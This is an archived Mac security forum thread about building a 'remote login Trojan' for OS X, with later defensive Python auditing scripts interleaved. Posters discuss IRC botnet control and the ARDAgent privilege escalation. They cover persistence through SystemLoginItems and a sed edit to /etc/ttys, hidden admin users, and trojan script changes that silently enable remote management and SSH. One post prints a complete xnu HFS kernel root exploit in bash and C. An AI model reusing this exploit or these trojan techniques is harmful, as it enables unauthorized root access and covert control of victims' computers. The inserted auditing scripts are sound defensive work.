Full Version: remote login Trojan
TSF - Mac Security Forums > Discussion > Programming
synack
The idea is that the application is scriptable using applescript. This means that if this application were installed with the trojan and the proper applescript handlers were written, you can connect to an irc channel and accept commands via irc like irc bots. The idea behind that is you will then have a distributed trojan resource and possible botnet feature. Google DDoS/IRCbot if you don't understand.
synack
QUOTE (Andrew#002 @ Jul 6 2008, 06:25 PM) *


Nice the, I like the first one already =)

http://www.scriptersguild.com/reference.html - this is an entire list of supported scripted handlers/events

Andrew#002
Yes but anything GUI is likely to be obvious. While AppleScript itself does not offer much networking support, it can interface with or control things which do. You might be better off using a command-line client and either controlling it through do shell script statements or having your AppleScript install a separate means of handling the irc client (a shell script for instance.) You could also use bash's socket features to implement your own irc client. http://jasonwoof.org/sifbot

Andrew#002
I noticed lots of links to terribly misinformed press regarding this thread and its various products (such as the Trojans.) I thought it might be nice to add some links which are to more informed press.

"Serious Security Vulnerabilty In Apple OS X Leopard"
http://blog.washingtonpost.com/securityfix...erabilty_1.html

"New Trojan Leverages Unpatched Mac Flaw"
http://blog.washingtonpost.com/securityfix..._unpatched.html

"ARDAgent.app Vulnerability Analysis"
http://blog.trailofbits.com/2008/07/05/ard...ility-analysis/

"ARDAgent Exploit, MacOS X Malware, and Snow Leopard, Oh My!"
http://blog.trailofbits.com/2008/06/22/ard...-leopard-oh-my/

"PokerStealer Another OSX Trojan"
http://ithreats.wordpress.com/2008/06/24/p...her-osx-trojan/

Andrew#002
http://news.softpedia.com/news/ARD-Patcher...oit-89332.shtml
QUOTE
ARD Patcher Fixes Apple Remote Desktop Exploit - No need for paid antivirus solutions

Or this program either...

QUOTE
"The truth: this trojan horse, so far, has not been documented in the wild, and in fact, we find it highly suspicious that multiple Anti-Virus companies have been able to get a hold of it."

They used a top-secret tool known as a "web browser" and exploited a service called "google" to find this thread.

Also, "/usr/bin/defaults write /System/Library/CoreServices/RemoteManagement/ARDAgent.app/Contents/Info NSAppleScriptEnabled YES" will NOT fix the ARDAgent issue. (Removing the suid bit from the executable will.)
Siph0n
QUOTE (Andrew#002 @ Jul 7 2008, 04:25 PM) *
http://news.softpedia.com/news/ARD-Patcher...oit-89332.shtml

Or this program either...


They used a top-secret tool known as a "web browser" and exploited a service called "google" to find this thread.

Also, "/usr/bin/defaults write /System/Library/CoreServices/RemoteManagement/ARDAgent.app/Contents/Info NSAppleScriptEnabled YES" will NOT fix the ARDAgent issue. (Removing the suid bit from the executable will.)


Which will be undone when they next repair permissions, unless you take care of that as well.
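The two posts above make a defender's point in passing: clearing the setuid bit on ARDAgent closes the escalation path, but a later "Repair Permissions" run silently puts the bit back. The check below is an added example (not code from the thread or from Apple) that records which watched paths currently carry the setuid bit, walks a tree for setuid files, and reports drift against a baseline you saved after hardening. The ARDAgent path is the one the thread names; the temporary files in `demo()` are constructed so the script runs anywhere.

```python
"""Audit setuid bits and detect drift from a hardening baseline (added example)."""
import os
import shutil
import stat
import tempfile

# Path from the thread. Extend with whatever your baseline says must stay non-setuid.
WATCHED_PATHS = [
    "/System/Library/CoreServices/RemoteManagement/ARDAgent.app/Contents/MacOS/ARDAgent",
]


def is_setuid(path):
    """True if `path` exists and has the setuid bit set."""
    try:
        return bool(os.stat(path).st_mode & stat.S_ISUID)
    except FileNotFoundError:
        return False


def audit_setuid(paths):
    """Map each path to 'setuid', 'clear' or 'missing'."""
    report = {}
    for p in paths:
        if not os.path.exists(p):
            report[p] = "missing"
        else:
            report[p] = "setuid" if is_setuid(p) else "clear"
    return report


def find_setuid_under(root):
    """Sorted list of regular files under `root` with the setuid bit set."""
    hits = []
    for dirpath, _dirs, files in os.walk(root):
        for name in files:
            full = os.path.join(dirpath, name)
            try:
                st = os.lstat(full)
            except OSError:
                continue  # unreadable or vanished entries are skipped, not fatal
            if stat.S_ISREG(st.st_mode) and st.st_mode & stat.S_ISUID:
                hits.append(full)
    return sorted(hits)


def setuid_drift(report, baseline):
    """Paths whose state differs from the baseline: {path: (baseline, now)}.

    A path that was 'clear' in the baseline and is 'setuid' now is exactly the
    "repair permissions undid my fix" case the thread describes.
    """
    return {p: (baseline.get(p), s) for p, s in report.items() if baseline.get(p) != s}


def demo():
    """Constructed demonstration: one setuid file, one plain file, one missing path."""
    tmp = tempfile.mkdtemp()
    suid_file = os.path.join(tmp, "suid_bin")
    plain_file = os.path.join(tmp, "plain_bin")
    for f in (suid_file, plain_file):
        with open(f, "w") as fh:
            fh.write("#!/bin/sh\nexit 0\n")
    os.chmod(suid_file, 0o4755)   # constructed: owner may set the setuid bit on own file
    os.chmod(plain_file, 0o755)
    report = audit_setuid([suid_file, plain_file, os.path.join(tmp, "missing_bin")])
    by_name = {os.path.basename(p): s for p, s in report.items()}
    hits = [os.path.basename(p) for p in find_setuid_under(tmp)]
    shutil.rmtree(tmp)
    return by_name, hits


if __name__ == "__main__":
    by_name, hits = demo()
    for name, state in by_name.items():
        print(f"{state:8} {name}")
    print("setuid files found:", hits)
    print("real host audit:", audit_setuid(WATCHED_PATHS))
```

Run it from cron or a launchd job and alert on a non-empty `setuid_drift()` result; the baseline should be written right after you clear the bit, not before.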
Andrew#002
Apple has released a fix for the ARDAgent vulnerability for Tiger/10.4.11, and Leopard. For any version of OS X prior to 10.4.11 which has the ARD Server included, the vulnerability still applies.

http://support.apple.com/kb/HT2647
andrewistheshit
I think I just cried. Hmm, now how to get elevated privileges without involving user stupidity. Dang, that exploit was so dang useful.
(Necro)
-sighs- what a lot of time to be spoiled >.< -frowns at apple-
(Necro)
oh and would someone mind telling me which page of this huge forum the script that runs on applescript resides in? my computer is slogging
Siph0n
QUOTE ((Necro) @ Aug 3 2008, 08:53 PM) *
oh and would someone mind telling me which page of this huge forum the script that runs on applescript resides in? my computer is slogging

47.
(Necro)
much appreciated ^.^ and dang that's a lot... -laughs- that must have induced some headaches
andrewistheshit
well we need to find a new way to get root without being owner or knowing password
stefanovich
Local root? Single user mode :)
(Necro)
oh ho! figured out the javascript to fast post :D now its an apple V away :)
anywho
speaking of sum, lets say we have the whole script and everything but already know their IP? if we knew that, we could just run everything but the emailing to self (which kind of slows mine down anyways) and then just log in as a guest, and access the public? yes? oh and back to sum, then with that you can run the whole thing with SUM and do whatever from there...
andrewistheshit
Oh wow, I feel stupid. Well, the thing I don't like about SUM is you can't use it and use your other stuff at the same time, but it's also nice that you can save files and execute them that way :] so you don't have to type a ton in SUM
stewy
Why is this thread 67 pages long..?
xercxes
Apologies if I've missed the page it's on but why do you need to do this?
Siph0n
QUOTE (xercxes @ Nov 18 2008, 04:15 AM) *
Apologies if I've missed the page it's on but why do you need to do this?

Wanna scissor or something?
saleanares
Could someone reupload it so I can test it? The rapidshare link was deleted.
squalb3ta
Hello

Great works !!

I'm a developer but not an OSX one. I'm just beginning to learn AppleScript.
I already know Bash, Perl, Python and C/C++, so Cocoa should come quickly :)

This thread taught me a lot of things, so I just wanted to say thanks !!!

One question:
- How do I add a bash, AppleScript or C++ program to an existing built app and have it run when the legit app is run for the first time?
(I mean, imagine I have a legit app, and I'd like to add my app into the built app, have it run hidden when the legit app is installed/run the first time, then move my app somewhere)

Thanks
squalb3ta
hmmm

On my Intel Mac the ARDAgent exploit doesn't work at all
CODE
tell application "ARDAgent" to do shell script "id"


always returns an error...

Note that I have Remote desktop 3.2 installed...

squalb3ta
Hi

Could someone explain why this code doesn't work?

I use an Intel Mac with 10.5.6


1- I have created the com.apple.SystemLoginItems.plist in /Library/Preferences

CODE
-rw-r--r--@  1 tester  staff   323 22 jul 23:05 com.apple.SystemLoginItems.plist




Here is the content of the plist
The plist links to an app bundle called mytest.app



2- The app bundle is mytest.app in /

CODE
$ ls -al / | grep mytest
drwxr-xr-x   3 tester  staff       102 22 jul 20:10 mytest.app


here is the contents of the bundle


and here is the contents of the bundle plist


and here is the very simple applescript in mytest.app
CODE
do shell script "id > /idresult"



3- tests

If I call the script, the file idresult is created and contains the full "id" result.
But when I delete the idresult file and then reboot, after the reboot no idresult file is created in /

So ????

Do you have some ideas ?
What could be the problem ?

Thanks for your help

squalb3ta
Ok it works...

But the problem is that the "auto login" login option has to be set to "disabled"

Moreover, this solution is deprecated and will no longer work under Snow Leopard...

You could try this one and also find a backup solution, for example setting the LoginHook in /etc/ttys.
You have to be root to edit this file.
Something like this should work with Leopard and Snow Leopard
CODE
sed 's|/System/Library/CoreServices/loginwindow.app/Contents/MacOS/loginwindow|/System/Library/CoreServices/loginwindow.app/Contents/MacOS/loginwindow -LoginHook /mytest.app|'</etc/ttys>/etc/ttys



squalb3ta
How to test if "auto login" in Login Options is set to "disabled"?

Because if it is set to a username, the SystemLoginItems won't work, and in this case another solution has to be found, such as a fake password prompt window or a fake login window

Thanks

EDIT ---

OK, found it: it is in /Library/Preferences/com.apple.loginwindow.plist
The autoLoginUser key exists, and if autologin is disabled it doesn't exist
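Read from the other side, the last two posts describe three things an auditor should check on a Mac of this era: whether `autoLoginUser` is present in /Library/Preferences/com.apple.loginwindow.plist (auto-login on), whether a `-LoginHook` argument has been spliced into the loginwindow line of /etc/ttys, and whether /Library/Preferences/com.apple.SystemLoginItems.plist exists at all. The script below is an added example, not code from the thread; the plist and ttys contents are constructed samples so it runs offline, and the `LoginHook` preference key it also checks is the documented loginwindow key rather than something the thread mentions.

```python
"""Audit auto-login and login-hook persistence points (added example)."""
import os
import plistlib
import re

LOGINWINDOW_BIN = "/System/Library/CoreServices/loginwindow.app/Contents/MacOS/loginwindow"
SYSTEM_LOGIN_ITEMS = "/Library/Preferences/com.apple.SystemLoginItems.plist"

# Constructed com.apple.loginwindow.plist with auto-login on and a LoginHook set.
SAMPLE_LOGINWINDOW_PLIST = b"""<?xml version="1.0" encoding="UTF-8"?>
<!DOCTYPE plist PUBLIC "-//Apple//DTD PLIST 1.0//EN" "http://www.apple.com/DTDs/PropertyList-1.0.dtd">
<plist version="1.0">
<dict>
    <key>autoLoginUser</key>
    <string>tester</string>
    <key>LoginHook</key>
    <string>/mytest.app</string>
</dict>
</plist>
"""

# Constructed plist with auto-login disabled: the key is simply absent.
SAMPLE_DISABLED_PLIST = b"""<?xml version="1.0" encoding="UTF-8"?>
<plist version="1.0"><dict></dict></plist>
"""

# Constructed /etc/ttys excerpt after the sed edit quoted in the thread.
SAMPLE_TTYS = """\
# name  getty  type  status  comments
console "/System/Library/CoreServices/loginwindow.app/Contents/MacOS/loginwindow -LoginHook /mytest.app" vt100 on secure onoption="/usr/libexec/getty std.9600"
ttyp0   "/usr/libexec/getty std.9600"  vt100  off secure
"""


def audit_loginwindow_plist(raw):
    """Findings from the raw bytes of com.apple.loginwindow.plist."""
    data = plistlib.loads(raw)
    return {
        "auto_login_user": data.get("autoLoginUser"),  # None => auto-login disabled
        "login_hook": data.get("LoginHook"),           # documented loginwindow key
    }


def audit_ttys(text):
    """LoginHook paths injected into the loginwindow entry of /etc/ttys."""
    hooks = []
    for line in text.splitlines():
        if line.startswith("#") or LOGINWINDOW_BIN not in line:
            continue
        m = re.search(r"-LoginHook\s+(\S+)", line)
        if m:
            hooks.append(m.group(1).rstrip('"'))
    return hooks


def summarize(plist_raw, ttys_text, system_login_items_path=SYSTEM_LOGIN_ITEMS):
    """Combine the three checks into one findings dict."""
    f = audit_loginwindow_plist(plist_raw)
    f["auto_login_enabled"] = f["auto_login_user"] is not None
    f["ttys_login_hooks"] = audit_ttys(ttys_text)
    f["system_login_items_present"] = os.path.exists(system_login_items_path)
    return f


if __name__ == "__main__":
    for k, v in summarize(SAMPLE_LOGINWINDOW_PLIST, SAMPLE_TTYS).items():
        print(f"{k:28} {v}")
```

On a live host, pass the bytes of the real loginwindow plist and the text of /etc/ttys; anything non-empty in `ttys_login_hooks`, or a `login_hook` you did not configure, is worth a look regardless of whether auto-login is on.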

squalb3ta
About ARDAgent in 10.5.6: it really seems not to work

Every time I launch an app bundle with ARDAgent I get this system log

QUOTE
23/07/09 18:15:00 ARDAgent [11421] OpenScripting.framework - 'gdut' event blocked in process with mixed credentials (issetugid=1 uid=0 euid=501 gid=20 egid=501)


for example this simple app bundle source code:

CODE
on ardagent_exploit()

    set tries to 0
    repeat until tries ≥ 20
        try
            set tries to tries + 1

            tell application "ARDAgent" to do shell script "id > /ardagent"
            set tries to 25
        on error error_message number error_number
            --log_event("ardagent_exploit:ERROR #" & error_number & " " & error_message)
        end try
    end repeat
    
end ardagent_exploit

ardagent_exploit()



returns this syslog

QUOTE
23/07/09 18:15:00 ARDAgent [11421] OpenScripting.framework - 'gdut' event blocked in process with mixed credentials (issetugid=1 uid=0 euid=501 gid=20 egid=501)
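That syslog line is the 10.5.6 mitigation refusing the Apple event: OpenScripting blocks a scripting event delivered to a process whose real and effective credentials differ. For a defender the refusal itself is the alert, since the retry loop in the post above produces one such line per attempt. The parser below is an added example (not from the thread) that extracts process, pid, event code and the credential fields from lines in that format and groups repeated attempts per process; the log excerpt is constructed around the line quoted above, with two unrelated lines added.

```python
"""Detect OpenScripting 'mixed credentials' blocks in system.log (added example)."""
import re
from collections import defaultdict

BLOCKED_RE = re.compile(
    r"^(?P<ts>\d{2}/\d{2}/\d{2} \d{2}:\d{2}:\d{2}) "
    r"(?P<proc>\S+) \[(?P<pid>\d+)\] OpenScripting\.framework - "
    r"'(?P<event>[^']+)' event blocked in process with mixed credentials "
    r"\((?P<fields>[^)]*)\)\s*$"
)

# Constructed sample: the thread's line twice (the retry loop) plus noise.
SAMPLE_LOG = """\
23/07/09 18:14:58 kernel[0] wake reason = EHC1
23/07/09 18:15:00 ARDAgent [11421] OpenScripting.framework - 'gdut' event blocked in process with mixed credentials (issetugid=1 uid=0 euid=501 gid=20 egid=501)
23/07/09 18:15:02 ARDAgent [11421] OpenScripting.framework - 'gdut' event blocked in process with mixed credentials (issetugid=1 uid=0 euid=501 gid=20 egid=501)
23/07/09 18:16:10 Finder[301] unrelated message
"""


def parse_blocked_event(line):
    """Dict for a 'mixed credentials' line, or None for any other line."""
    m = BLOCKED_RE.match(line)
    if not m:
        return None
    rec = m.groupdict()
    rec["pid"] = int(rec["pid"])
    # fields look like "issetugid=1 uid=0 euid=501 gid=20 egid=501"
    creds = dict(kv.split("=", 1) for kv in rec.pop("fields").split())
    rec.update({k: int(v) for k, v in creds.items()})
    return rec


def detect(log_text):
    """Group blocked events per (process, pid) and return one alert each.

    An alert is raised when real and effective uid differ and one of them is
    root: a privileged process is being driven from an unprivileged context,
    which is what the ARDAgent technique relies on.
    """
    buckets = defaultdict(list)
    for line in log_text.splitlines():
        rec = parse_blocked_event(line)
        if rec is None:
            continue
        uid, euid = rec.get("uid"), rec.get("euid")
        if uid != euid and 0 in (uid, euid):
            buckets[(rec["proc"], rec["pid"])].append(rec)
    alerts = []
    for (proc, pid), recs in sorted(buckets.items()):
        alerts.append({
            "process": proc,
            "pid": pid,
            "event": recs[0]["event"],
            "uid": recs[0]["uid"],
            "euid": recs[0]["euid"],
            "attempts": len(recs),
            "first_seen": recs[0]["ts"],
            "last_seen": recs[-1]["ts"],
        })
    return alerts


if __name__ == "__main__":
    for a in detect(SAMPLE_LOG):
        print(a)
```

Feed it `/var/log/system.log` (or the output of `syslog`) on a schedule; a burst of attempts against one pid, as the 20-try loop above would produce, is a stronger signal than a single line.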
squalb3ta
Could someone with OS 10.5.6 and Remote Desktop update 3.2.2 tell me if the ARDAgent trick works for them?
Nilkimas
The ARDAgent exploit hasn't worked for quite some time now. It was fixed 2-3 months after the vulnerability became widely known, which is still too long, considering it grants you root permissions.
To test it you'd have to downgrade your OS X version.
squalb3ta
QUOTE (Nilkimas @ Jul 23 2009, 11:31 PM) *
The ARDAgent exploit hasn't worked for quite some time now. It was fixed 2-3 months after the vulnerability became widely known, which is still too long, considering it grants you root permissions.
To test it you'd have to downgrade your OS X version.


Ok thanks :)

And did you try this HFS+ mount exploit, which works on 10.5 - 10.5.6?

CODE
#!/bin/bash
# name: xnu-hfs-fcntl-v2.sh

IMAGE=xnu-hfs
EXPFILE=xnu-hfs-fcntl-v2

echo -en "Apple MACOS X xnu <= 1228.x local kernel root exploit\n"

if [ ! -f $EXPFILE ]; then
  echo -n "* compiling exploit..."
  gcc -Wall $EXPFILE.c -o $EXPFILE 2> /dev/null
  if [ $? != 0 ]; then
    echo " failed"
    exit $?
  else
    echo " done"
  fi
fi

if [ ! -f $IMAGE.dmg ]; then
  echo -n "* creating diskimage..."
  hdiutil create -megabytes 1 -fs HFS+ -volname $IMAGE $IMAGE.dmg > /dev/null
  if [ $? != 0 ]; then
    echo " failed"
    exit $?
  else
    echo " done"
  fi
fi

echo -n "* attaching/mounting diskimage..."
hdiutil attach $IMAGE.dmg > /dev/null
if [ $? != 0 ]; then
  echo " failed"
  exit $?
else
  echo " done"
fi

echo -e "* executing exploit...\n"
./$EXPFILE /Volumes/$IMAGE

echo -n "* detaching/unmounting diskimage..."
hdiutil detach /Volumes/$IMAGE > /dev/null
if [ $? != 0 ]; then
  echo " failed"
  exit $?
else
  echo " done"
fi


CODE
/* name: xnu-hfs-fcntl-v2.c */

#include <stdio.h>
#include <stdlib.h>

#include <errno.h>
#include <fcntl.h>
#include <string.h>
#include <sys/attr.h>
#include <sys/syscall.h>
#include <sys/utsname.h>
#include <unistd.h>

#define OSX_TIGER           0x04
#define OSX_LEOPARD         0x05

#define HFS_GET_BOOT_INFO   0x00010004
#define SYSCALL_NUM         21
#define TIGER_HIT_ADDY(a)   ((a)+0x20+((sizeof (struct sysent)-sizeof (int))*SYSCALL_NUM))
#define LEOPARD_HIT_ADDY(a) ((a)+0x20+(sizeof (struct sysent)*SYSCALL_NUM))

/* 1228.x, bsd/sys/sysent.h */
struct sysent {
  short sy_narg;
  char  sy_resv;
  char  sy_flags;
  void  *sy_call;
  void  *sy_arg_munge32;
  void  *sy_arg_munge64;
  int   sy_return_type;
  short sy_arg_bytes;
};

static unsigned char ztiger[] =
  "\x55"
  "\x89\xe5"
  "\x8b\x45\x08"
  "\x8b\x40\x08"
  "\xc7\x40\x10\x00\x00\x00\x00"
  "\x31\xc0"
  "\xc9"
  "\xc3";

static unsigned char zleopard[] =
  "\x55"
  "\x89\xe5"
  "\x8b\x45\x08"
  "\x8b\x40\x64"
  "\xc7\x40\x10\x00\x00\x00\x00"
  "\x31\xc0"
  "\xc9"
  "\xc3";

static struct targets {
  const char *name;
  int shell_addr;   /* &copyright */
  int sys_addr;     /* &nsysent   */
  const int type;
} targets_t[] = {
  /* tiger */
  { "root:xnu-792.14.14.obj~1/RELEASE_I386", 0x004518ac, 0x00451920, OSX_TIGER },
  { "root:xnu-792.18.15~1/RELEASE_I386", 0x004528ec, 0x00452960, OSX_TIGER },
  { "root:xnu-792.22.5~1/RELEASE_I386", 0x004548ec, 0x00454960, OSX_TIGER },
  { "root:xnu-792.25.20~1/RELEASE_I386", 0x004548ec, 0x00454960, OSX_TIGER },
  /* leopard */
  { "root:xnu-1228~1/RELEASE_I386", 0x0050170c, 0x00501780, OSX_LEOPARD },
  { "root:xnu-1228.0.2~1/RELEASE_I386", 0x0050270c, 0x00502780, OSX_LEOPARD },
  { "root:xnu-1228.3.13~1/RELEASE_I386", 0x0050470c, 0x00504780, OSX_LEOPARD },
  { "root:xnu-1228.5.18~1/RELEASE_I386", 0x0050770c, 0x00507780, OSX_LEOPARD },
  { "root:xnu-1228.5.20~1/RELEASE_I386", 0x0050770c, 0x00507780, OSX_LEOPARD },
  { "root:xnu-1228.7.58~1/RELEASE_I386", 0x0050770c, 0x00507780, OSX_LEOPARD },
  { "root:xnu-1228.9.59~1/RELEASE_I386", 0x0050A70c, 0x0050A780, OSX_LEOPARD },
  { NULL, 0, 0, 0 },
};

int
main (int argc, char **argv)
{
  struct utsname p_uname;
  struct sysent fsysent;
  struct attrlist attr;
  char buf_attr[2048], *ptr;
  int shell_addr, sys_addr, sysent_addr;
  int fd, id, i, n, type;

  printf ("Apple MACOS X xnu <= 1228.x local kernel root exploit\n");

  if (argc < 2)
    {
      fprintf (stderr, "Usage: %s <hfs volume>\n", argv[0]);
      exit (EXIT_FAILURE);
    }

  shell_addr = 0;
  sys_addr = 0;
  type = 0;
  uname (&p_uname);

  ptr = strrchr (p_uname.version, ' ') + 1;
  for (i = 0; targets_t[i].name; i++)
    if (strcmp (targets_t[i].name, ptr) == 0)
      {
        shell_addr = targets_t[i].shell_addr;
        sys_addr = targets_t[i].sys_addr;
        type = targets_t[i].type;
        break;
      }

  if (targets_t[i].name == NULL)
    {
      fprintf (stderr, "%s: unsupported xnu version found :( [%s]\n",
               argv[0], ptr);
      exit (EXIT_FAILURE);
    }

  printf ("* getattrlist...");
  fflush (stdout);

  attr.bitmapcount = ATTR_BIT_MAP_COUNT;
  attr.commonattr = ATTR_CMN_FNDRINFO;
  attr.volattr = 0;
  attr.dirattr = 0;
  attr.fileattr = 0;
  attr.forkattr = 0;
  n = getattrlist (argv[1], &attr, (void *) buf_attr, sizeof (buf_attr), 0);
  if (n < 0)
    {
      fprintf (stderr, "\n%s: getattrlist failed\n", argv[0]);
      exit (EXIT_FAILURE);
    }
  printf ("done\n");

  printf ("** attrlist length: %d\n", *(int *) &buf_attr[0]);
  printf ("** fndrinfo: ");
  for (i = 4; i < *(int *) &buf_attr[0]; i++)
    printf ("%c", buf_attr[i]);
  printf ("\n* done\n\n");

  if (type == OSX_TIGER)
    memcpy (&buf_attr[4], ztiger, sizeof (ztiger) - 1);
  else if (type == OSX_LEOPARD)
    memcpy (&buf_attr[4], zleopard, sizeof (zleopard) - 1);
  else
    {
      fprintf (stderr, "\n%s: unknown type!\n", argv[0]);
      exit (EXIT_FAILURE);
    }

  printf ("* setattrlist...");
  fflush (stdout);

  attr.bitmapcount = ATTR_BIT_MAP_COUNT;
  attr.commonattr = ATTR_CMN_FNDRINFO;
  attr.volattr = ATTR_VOL_INFO;
  attr.dirattr = 0;
  attr.fileattr = 0;
  attr.forkattr = 0;
  n = setattrlist (argv[1], &attr, (void *) &buf_attr[4], sizeof (buf_attr) - 4, 0);
  if (n < 0)
    {
      fprintf (stderr, "\n%s: setattrlist failed\n", argv[0]);
      exit (EXIT_FAILURE);
    }
  printf ("done\n");
  sleep (2);

  fd = open (argv[1], O_RDONLY);
  if (fd < 0)
    {
      fprintf (stderr, "%s: open failed\n", argv[0]);
      exit (EXIT_FAILURE);
    }

  printf ("* overwriting @0x%08X\n", shell_addr);
  fflush (stdout);

  n = fcntl (fd, HFS_GET_BOOT_INFO, shell_addr);
  if (n < 0)
    {
      fprintf (stderr, "%s: fcntl failed\n", argv[0]);
      exit (EXIT_FAILURE);
    }
  printf ("* done\n\n");

  fsysent.sy_narg = 1;
  fsysent.sy_resv = 0;
  fsysent.sy_flags = 0;
  fsysent.sy_call = (void *) shell_addr;
  fsysent.sy_arg_munge32 = NULL;
  fsysent.sy_arg_munge64 = NULL;
  fsysent.sy_return_type = 0;
  fsysent.sy_arg_bytes = 4;
  memcpy (&buf_attr[4], &fsysent, sizeof (struct sysent));

  printf ("* setattrlist...");
  fflush (stdout);

  attr.bitmapcount = ATTR_BIT_MAP_COUNT;
  attr.commonattr = ATTR_CMN_FNDRINFO;
  attr.volattr = ATTR_VOL_INFO;
  attr.dirattr = 0;
  attr.fileattr = 0;
  attr.forkattr = 0;
  n = setattrlist (argv[1], &attr, (void *) &buf_attr[4], sizeof (buf_attr) - 4, 0);
  if (n < 0)
    {
      fprintf (stderr, "\n%s: setattrlist failed\n", argv[0]);
      exit (EXIT_FAILURE);
    }
  printf ("done\n");
  sleep (2);

  if (type == OSX_TIGER)
    sysent_addr = TIGER_HIT_ADDY(sys_addr);
  else if (type == OSX_LEOPARD)
    sysent_addr = LEOPARD_HIT_ADDY(sys_addr);
  else
    {
      fprintf (stderr, "\n%s: unknown type!\n", argv[0]);
      exit (EXIT_FAILURE);
    }

  printf ("* overwriting @0x%08X\n", sysent_addr);
  printf ("** sysent[%d].sy_call: 0x%08X\n", SYSCALL_NUM, shell_addr);
  fflush (stdout);

  n = fcntl (fd, HFS_GET_BOOT_INFO, sysent_addr);
  if (n < 0)
    {
      fprintf (stderr, "%s: fcntl failed\n", argv[0]);
      exit (EXIT_FAILURE);
    }
  printf ("* done\n\n");

  printf ("* jumping...");
  sleep (2);

  n = syscall (SYSCALL_NUM, NULL);
  printf ("done\n\n");

  id = getuid ();
  printf ("* getuid(): %d\n", id);
  if (id == 0)
    {
      printf ("+Wh00t\n\n");

      /* exec shell, for some reason execve doesn't work!?$! */
      system ("/bin/bash");
    }
  else
    fprintf (stderr, "%s: failed to obtain root :(\n", argv[0]);

  return (EXIT_SUCCESS);
}


Note that I don't have the owner reference, so I can't tell who discovered this ... (a friend gave me this code)
squalb3ta
The template script is a good starting point and contains a huge amount of information !!

Callmenames you are amazing !

Ok mine would be a little different :)

The main idea is to gain root access using a few exploits (SystemLoginItems, ARDAgent, MACHEx, NFS+, etc.) or by duping the user.
Once you have this I'd create a hidden admin user
Then with a
CODE
echo pwdofadmin | sudo -S cmd
or
CODE
sudo -S cmd < /path/to/my/.secretpwd

I could do everything !!

I don't understand why the script template hopes to be within the sudo timestamp period :)

Anyway, once again it contains a ton of pretty good information :)
squalb3ta
Some comments for 10.5.5 and later

Change this
CODE
set ip_addresses to (do shell script "IPaddress_en0=$(ifconfig en0 2>/dev/null | head -n 2 | tail -n 1 | sed -e 's/^.*inet //' -e 's/ .*$//' ) && echo \"${IPaddress_en0}\"") & " " & (do shell script "IPaddress_en1=$(ifconfig en1 2>/dev/null | head -n 2 | tail -n 1 | sed -e 's/^.*inet //' -e 's/ .*$//' ) && echo \"${IPaddress_en1}\"") & " " & (do shell script "router_IPaddress=$( arp -a | sed -e 's/^.* (//' -e 's/).*$//' ) && echo \"${router_IPaddress}\"")


to this
CODE
set ip_addresses to (do shell script "IPaddress_en0=$(ifconfig en0 2>/dev/null | head -n 3 | tail -n 1 | sed -e 's/^.*inet //' -e 's/ .*$//' ) && echo \"${IPaddress_en0}\"") & " " & (do shell script "IPaddress_en1=$(ifconfig en1 2>/dev/null | head -n 3 | tail -n 1 | sed -e 's/^.*inet //' -e 's/ .*$//' ) && echo \"${IPaddress_en1}\"") & " " & (do shell script "router_IPaddress=$( arp -a | head -n 1 | sed -e 's/^.* (//' -e 's/).*$//' ) && echo \"${router_IPaddress}\"")


Basically
- change all head -n 2 to head -n 3 (because head -n 2 shows only the inet6 IP address)
- add a head -n 1 to the arp -a


Also note that kickstart of ARDAgent needs to be run as root or via sudo !!
You should change all these lines
CODE
-- Disable the Remote Management menu extra.
do shell script "/System/Library/CoreServices/RemoteManagement/ARDAgent.app/Contents/Resources/kickstart -configure -clientopts -setmenuextra -menuextra no"
--For Leopard
do shell script "/System/Library/CoreServices/RemoteManagement/ARDAgent.app/Contents/Resources/kickstart -deactivate"
-- Allow access for all users and give all users full access.
do shell script "/System/Library/CoreServices/RemoteManagement/ARDAgent.app/Contents/Resources/kickstart -configure -allowAccessFor -allUsers -privs -all"
-- Start the Remote Management service.
do shell script "/System/Library/CoreServices/RemoteManagement/ARDAgent.app/Contents/Resources/kickstart -activate"


So if you know the admin/root user password, or if you have created a new admin/root user, change them to
CODE
-- Disable the Remote Management menu extra.
do shell script "echo 'password' | sudo -S  /System/Library/CoreServices/RemoteManagement/ARDAgent.app/Contents/Resources/kickstart -configure -clientopts -setmenuextra -menuextra no"
--For Leopard
do shell script "echo 'password' | sudo -S   /System/Library/CoreServices/RemoteManagement/ARDAgent.app/Contents/Resources/kickstart -deactivate"
-- Allow access for all users and give all users full access.
do shell script "echo 'password' | sudo -S   /System/Library/CoreServices/RemoteManagement/ARDAgent.app/Contents/Resources/kickstart -configure -allowAccessFor -allUsers -privs -all"
-- Start the Remote Management service.
do shell script "echo 'password' | sudo -S   /System/Library/CoreServices/RemoteManagement/ARDAgent.app/Contents/Resources/kickstart -activate"


or just use sudo if this script is run as root


NOTE that on Leopard systemsetup isn't in
QUOTE
/System/Library/CoreServices/RemoteManagement/ARDAgent.app/Contents/Support/


but in
QUOTE
/usr/sbin/


So this part has to be modified from
CODE
on enable_ssh()
    if debug then log_event("enable_ssh")
    try
        if i_am_an_admin then
            --This *should* work from any admin account, without sudo or root, for any version of OS X which
            --includes ARD Client (server) such as 10.3, 10.4 and 10.5.
            do shell script "/System/Library/CoreServices/RemoteManagement/ARDAgent.app/Contents/Support/systemsetup -setremotelogin on &"
            --And while I'm here...
            do shell script "/System/Library/CoreServices/RemoteManagement/ARDAgent.app/Contents/Support/systemsetup -setcomputersleep Never &" --(logic board only)
            do shell script "/System/Library/CoreServices/RemoteManagement/ARDAgent.app/Contents/Support/systemsetup -setrestartpowerfailure on &"
            do shell script "/System/Library/CoreServices/RemoteManagement/ARDAgent.app/Contents/Support/systemsetup -setrestartfreeze on &"
            do shell script "/System/Library/CoreServices/RemoteManagement/ARDAgent.app/Contents/Support/systemsetup -setremoteappleevents on &"
        end if
    end try


to
CODE
if OSX_version_number_minor as number ≥ 5 then --For Leopard
    do shell script "/usr/sbin/systemsetup -setremotelogin on &"
    --And while I'm here...
    do shell script "/usr/sbin/systemsetup -setcomputersleep Never &" --(logic board only)
    do shell script "/usr/sbin/systemsetup -setrestartpowerfailure on &"
    do shell script "/usr/sbin/systemsetup -setrestartfreeze on &"
    do shell script "/usr/sbin/systemsetup -setremoteappleevents on &"
else if OSX_version_number_minor as number ≤ 4 then --For Tiger and prior
    do shell script "/System/Library/CoreServices/RemoteManagement/ARDAgent.app/Contents/Support/systemsetup -setremotelogin on &"
    --And while I'm here...
    do shell script "/System/Library/CoreServices/RemoteManagement/ARDAgent.app/Contents/Support/systemsetup -setcomputersleep Never &" --(logic board only)
    do shell script "/System/Library/CoreServices/RemoteManagement/ARDAgent.app/Contents/Support/systemsetup -setrestartpowerfailure on &"
